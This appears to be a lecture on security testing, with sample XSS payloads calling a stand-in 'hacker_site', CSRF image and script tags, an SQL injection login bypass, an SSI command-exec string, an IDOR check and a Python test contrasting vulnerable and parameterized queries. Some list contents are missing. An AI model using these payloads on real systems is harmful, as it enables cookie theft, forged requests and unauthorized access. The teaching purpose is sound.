Lecture
Security testing is a testing strategy used to check the security of a system and to analyze the risks involved in providing a holistic approach to protecting an application from hacker attacks, viruses, and unauthorized access to confidential data.
The overall security strategy is based on three main principles:
Confidentiality is the concealment of certain resources or information. Confidentiality can be understood as restricting access to a resource to a certain category of users, or in other words, the conditions under which a user is authorized to access the resource.
There are two main criteria when defining the concept of integrity:
Accessibility is a requirement that resources must be available to an authorized user, internal object, or device. As a rule, the more critical a resource is, the higher the level of availability should be.
Currently, the most common types of software security vulnerabilities are:
Below are examples of testing software for security vulnerabilities. To do this, you need to check your software for known types of vulnerabilities:
XSS attacks themselves can be very diverse. Attackers can try to steal your cookies, redirect you to a site where a more serious attack will occur, load a malicious object into memory, etc., just by placing a malicious script on your site. As an example, consider the following script that displays your cookies:
<script>alert(document.cookie);</script>
or a script that redirects to the infected page:
<script>window.parent.location.href = 'http://hacker_site';</script>
or creating a malicious object with a virus, etc.:
<object type="text/x-scriptlet" data="http://hacker_site"></object>
To view more examples, we recommend visiting the page: XSS (Cross Site Scripting) ...
The most frequent CSRF attacks are attacks using the HTML <IMG> tag or the JavaScript Image object. Most often, an attacker adds the necessary code to an email or puts it on a website, so that when the page loads, a request is sent that executes the malicious code. Examples:
IMG SRC
<img src="http://hacker_site/?command">
SCRIPT SRC
<script src="http://hacker_site/?command"></script>
JavaScript Image object
<script>var foo = new Image(); foo.src = "http://hacker_site/?command";</script>
We will consider the injection of executable code using SQL code as an example.
The login form has 2 fields - name and password. Processing takes place in the database through the execution of an SQL query:
SELECT Username FROM Users WHERE Name = 'tester' AND Password = 'testpass';
Enter the correct name 'tester', and in the password field enter the line:
testpass' OR '1'='1
As a result, if the field does not have the appropriate validations or data handlers, a vulnerability may appear that allows you to log into the password-protected system, since the SQL request will look like this:
SELECT Username FROM Users WHERE Name = 'tester' AND Password = 'testpass' OR '1' = '1';
The condition '1' = '1' will always be true and therefore the SQL query will always return many values.
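The login check above as a repeatable security test, given here as an added example in Python with sqlite3 (not code from the lecture). It runs the same input against a query built by string concatenation and against a parameterized query; the table layout, sample rows and function names are assumptions constructed for the illustration.

```python
import sqlite3

# Input from the lecture: correct name, crafted password field.
INJECTION_INPUT = "testpass' OR '1'='1"

def make_db():
    # Constructed sample data. The plaintext Password column mirrors the
    # lecture's query; real systems store password hashes instead.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Users (Username TEXT, Name TEXT, Password TEXT)")
    db.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [("Tester One", "tester", "testpass"),
         ("Admin", "admin", "constructed-admin-pass")],
    )
    return db

def login_concat(db, name, password):
    # Vulnerable form: user input becomes part of the SQL text itself.
    sql = ("SELECT Username FROM Users WHERE Name = '" + name +
           "' AND Password = '" + password + "';")
    return [row[0] for row in db.execute(sql)]

def login_param(db, name, password):
    # Hardened form: placeholders keep the input as data, never as syntax.
    sql = "SELECT Username FROM Users WHERE Name = ? AND Password = ?;"
    return [row[0] for row in db.execute(sql, (name, password))]

def passes_injection_test(login):
    """True if valid credentials work and the crafted input returns no rows."""
    db = make_db()
    valid_ok = login(db, "tester", "testpass") == ["Tester One"]
    crafted_rejected = login(db, "tester", INJECTION_INPUT) == []
    return valid_ok and crafted_rejected

if __name__ == "__main__":
    for fn in (login_concat, login_param):
        verdict = "PASS" if passes_injection_test(fn) else "FAIL"
        print(f"{fn.__name__}: {verdict}")
```

Because AND binds more tightly than OR, the concatenated query matches every row in Users, not only the row for 'tester', which is why the first function fails the test.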
The commands may differ depending on the type of operating system. As an example, consider the command that displays a list of files in the Linux OS:
<!--#exec cmd="ls" -->
User A can access user B's documents. Suppose there is an implementation where, when a user views his profile containing confidential information, the userID is passed in the page URL. In this case it makes sense to try substituting the userID number of another user. If you see that user's data, it means you have found a defect.
There are a huge number of examples of vulnerabilities and attacks. Even after conducting a full cycle of security testing, you cannot be 100% sure that the system is truly secure. But you can be sure that the percentage of unauthorized penetrations, theft of information and data loss will be several times lower than for those who did not conduct security testing.